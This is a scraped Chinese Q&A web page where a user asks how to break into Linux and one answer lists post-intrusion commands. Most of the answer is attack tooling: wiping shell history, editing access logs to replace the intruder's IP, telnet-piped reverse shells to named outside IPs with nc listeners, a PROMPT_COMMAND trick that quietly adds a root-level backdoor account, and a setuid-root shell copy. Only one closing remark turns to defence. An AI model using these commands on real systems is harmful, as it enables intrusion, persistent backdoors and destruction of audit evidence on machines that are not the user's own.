问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

linux 怎么入侵??

发布网友 发布时间:2022-04-29 23:14

我来回答

1个回答

热心网友 时间:2022-06-25 14:07

1,登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些*用法
*的替换到登录的IP和日志里的访问IP
sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security
*的添加ssh*登录的用户
sed -i ’s/AllowUsers * root oracle/AllowUsers * root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662
3.通过webshell反弹shell回来之后获取真正的ttyshell
python -c ‘import pty; pty.spawn(“/bin/sh”)’
另外一种获取ttyshell的方法
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
bash sh.exp
4.通过TELNET进行反向连接:
telnet [attacker_ipaddr] [port1] /bin/bash telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 /bin/bash telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001
在203.93.28.236上面运行:
nc –l –p 8000
nc –l –p 8001
/usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089
5.curl download
The full command should look something like this:
curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法
unalias ls
7.linux的BASH提权
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”
8.ssh tunnel
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
9.本地rootshell
bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个操作
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
招聘和招募和招收区别 人力资源中招聘与招募的区别 招聘与招募有啥区别 夏日繁星公众号可信吗 关于“红杏出墙”的古诗词描写有哪些 需要考多少分才过雅思 雅思考试多少分才可以算及格 雅思考试多少分算及格 雅思的总分多少分及格 雅思一般考多少分能合格 有什么视频播放器自带强大的解码器的吗? 电影院的解码视频播放器怎么弄 视频解码播放器 请推荐一款比较好的视频播放器或解码器软件!! 一部鬼片讲了一个小恶魔在微信上发红包,完不成任务就要死的电影叫什么 超级解码是什么 谁能介绍几本做任务的灵异小说 深圳去外地需要核酸检测吗 解码最厉害,播放视频最牛的视频播放器是哪一款视频播放器!!! 灵异小说,手机发布任务,女主叫荔枝,有只猫,男主从任务里带出个孩 询问一部恐怖小说。主角无意进入一栋房子,房子会在墙上发布恐怖任务,有点类似无限恐怖。 Excel表格的部分数据是如何隐藏的 恐怖小说,开局是在一个教室里然后 做一些任务发布任务的是一个小丑,主角推理流每次做完任务会回到教室? 有谁用过ML87茶轴的机械键盘的,给点建议 手机视频播放器哪个解码能力强 深圳会展中心5号门有免费核酶检测点吗? 嗯…求推荐一个恐怖小说,校园风的,就是那种莫名其妙咋的,然后就要做任务啥的,任务失败就会死人的那种 请问雷帕机械键盘选青轴还是红轴? 主角叫向南,小恶魔发微信红包谁抢到运气王就要做任务,完不成就要死 到过深圳盒马水贝店人员免费核酸检测,谁来承担费用? 急求带超级解码视频播放器,支持资源库边下边看功能 请教,哪个视频播放器支持的解码格式最多? 什么电脑视频播放器解码最好,播放高清不卡的? Linux服务器怎样防范黑客的攻击 网站入侵该学什么? 如何用linux入侵windows系统?简单分析下步骤 推荐几个解码能力强大的视频播放器,最好是几乎所有格式的视频通吃的最好 linux8080 端口被攻击,这是怎么做到的 linux攻击 求一款解码非常好,非常清晰的视频播放器 求大神帮忙,一般linux服务器被攻击会有哪 怎样修改里的地区 华为V9在哪开启otg功能,手机需要读取U盘里的资料 荣耀v9能外接u盘吗 你好能详细告诉我一下华为荣耀V9怎样往U盘上传输数据了谢谢 荣耀9怎么链接U盘 荣耀v9有OTG功能吗? 华为荣耀v9 plus手机怎样打开OTG功能? 华为v9的OTG功能在那里 荣耀v9OTG怎么用
懂视 51dongshi.com 版权所有
Copyright © 2019-2024